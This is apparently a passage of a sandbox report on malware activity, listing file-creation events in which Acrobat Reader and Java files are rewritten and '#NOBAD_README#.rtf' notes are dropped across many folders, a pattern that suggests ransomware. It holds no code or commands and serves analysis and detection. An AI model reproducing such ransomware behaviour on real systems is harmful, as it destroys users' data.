| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tr.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_ie8.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_TW.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\jfxrt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_18DFC06EA5F8FC78.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_18DFC06EA5F8FC78.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-57x57-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ind_prog.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-left.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\text_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_patterns_header.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-72x72-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_pattern_RHP.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\amd64\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
